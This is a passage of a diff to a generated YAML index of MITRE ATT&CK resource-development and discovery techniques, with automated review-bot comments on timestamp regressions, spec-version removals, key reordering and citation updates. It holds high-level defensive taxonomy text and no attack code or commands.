.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
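Review bot: modified for T1622 goes from '2022-05-11T14:00:00.188Z' back to '2022-04-16T15:05:55.918Z' while x_mitre_attack_spec_version stays at 2.1.0 in the next hunk; that combination is self-consistent (the object has not been touched upstream since the 2.1.0 era) and is further evidence that the earlier 14:00:00.188Z timestamps were placeholders. Nothing to change here beyond mentioning the timestamp correction in the commit message.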
@@ -51127,7 +51809,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1124:
@@ -51230,13 +51911,12 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests: []
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -51247,7 +51927,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -51318,29 +51998,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
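Review bot: the updated description says "Google Apps Scripts"; the product name is "Google Apps Script" (singular), and the citation key added two lines later is "GWS Apps Script Abuse 2021", so the text and the key now disagree on the name. This is upstream ATT&CK wording, so it should be corrected upstream rather than edited in this generated file. The rest of the hunk is key reordering plus the 1.0 to 1.1 version bump and the new [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) cross-reference, all consistent with the new citation.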
@@ -51364,15 +52043,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
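Review bot: the new GWS Apps Script Abuse 2021 reference URL ends in "#google_vignette", which is the fragment BleepingComputer's ad interstitial appends to the address bar and is not part of the article's canonical URL; it is harmless when fetching but is noise in a citation, and since it appears verbatim in the upstream object it should be reported there rather than stripped here. The x_mitre_attack_spec_version bump from 2.1.0 to 3.2.0 is consistent with the 2024-07-01 modified date in the previous hunk.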
@@ -51404,17 +52086,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -51467,11 +52148,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -51507,7 +52187,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -51556,43 +52236,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
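Review bot: T1588.004 loses `id`, `type`, `created`, `created_by_ref`, `object_marking_refs` and its whole `external_references` list in this hunk with nothing added in their place; the following hunk re-adds them with the same values in a different key order, so this is a reorder rather than a loss, but confirm that every dropped key reappears (in particular the `id: attack-pattern--19401639-...` that consumers key on). The `modified` move to 2024-09-16 here lines up with the updated Recorded Future retrieval date in that later hunk. If the index is regenerated from the upstream STIX bundle, emitting keys in a stable sorted order would keep the real change visible instead of burying it under reordering churn.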
@@ -51605,18 +52254,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
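Review bot: the only substantive reference change in this reorder is the Recorded Future entry, whose URL moves from `https://www.recordedfuture.com/cobalt-strike-servers/` to `https://www.recordedfuture.com/research/cobalt-strike-servers` and whose retrieval date becomes September 16, 2024; the other three references keep their 2017 and 2020 retrieval dates and URLs. `revoked: false` and `x_mitre_deprecated: false` are new explicit flags, and `x_mitre_version` stays at '1.2', which is consistent with a reference-only update. Since `(Citation: ...)` markers in the description and detection text resolve by `source_name`, the new ordering of `external_references` is harmless.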
T1583.002:
technique:
@@ -51638,7 +52318,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
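Review bot: `modified` for T1583.002 moves backwards, from 2022-04-25T14:00:00.188Z to 2021-04-15T02:49:49.702Z, and the same backward move recurs for most objects in this diff (T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002, T1584.003, T1588.001, T1586, T1584.005). The removed value is the same 2022-04-25T14:00:00.188Z (or 2022-05-11T14:00:00.188Z / 2023-05-09T14:00:00.188Z) across many objects while the added values are distinct per object, which looks like a bulk timestamp being replaced by the upstream per-object one. Worth stating in the commit message, because anything that syncs on `modified` being greater than the last seen value will treat these objects as unchanged.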
@@ -51654,8 +52334,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
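Review bot: T1583.002 drops both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement, so after this change the object has no attack-spec version at all, whereas T1588.004 above gets `x_mitre_attack_spec_version: 3.2.0`. The same removal-without-replacement repeats for T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002, T1584.003 and T1588.001 further down. If anything downstream reads `x_mitre_attack_spec_version`, it now has to tolerate the key being absent; otherwise confirm the generator is meant to drop it when the source object lacks it rather than carry the previous value forward.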
@@ -51677,7 +52355,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -51697,8 +52375,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -51737,7 +52413,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -51758,8 +52434,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -51789,7 +52463,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -51826,8 +52500,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -51849,7 +52521,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -51871,8 +52543,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -51909,7 +52579,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -51931,8 +52601,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -51994,7 +52662,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -52016,7 +52683,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52034,8 +52701,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -52070,7 +52735,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52089,33 +52754,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
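Review bot: the expanded T1586.003 description adds a sentence on abuse of cloud messaging services (Twilio, SendGrid, AWS End User Messaging, SNS, SES) for spam or phishing and introduces two new citation keys, `Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022` and `Netcraft SendGrid 2024`; both are defined in the next hunk's `external_references`, and the `x_mitre_version` bump from '1.0' to '1.1' matches a content change. The rest of the hunk is key reordering (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_platforms`, `x_mitre_is_subtechnique` move position with unchanged values). `x_mitre_detection` is unchanged and still points only at exfiltration-stage behaviour, so the index carries no detection guidance for the messaging-service abuse the description now covers; that is upstream content, not something to patch here.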
@@ -52125,10 +52788,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
@@ -52136,9 +52808,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
@@ -52189,11 +52860,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52206,7 +52876,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
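Review bot: the contributor entry changes from `Goldstein Menachem` to `Menachem Goldstein` here and again in the T1584 hunk below; since the same name appears in more than one technique, a quick grep over the whole file for the old ordering would confirm no third copy was missed by the regeneration.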
@@ -52241,22 +52911,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
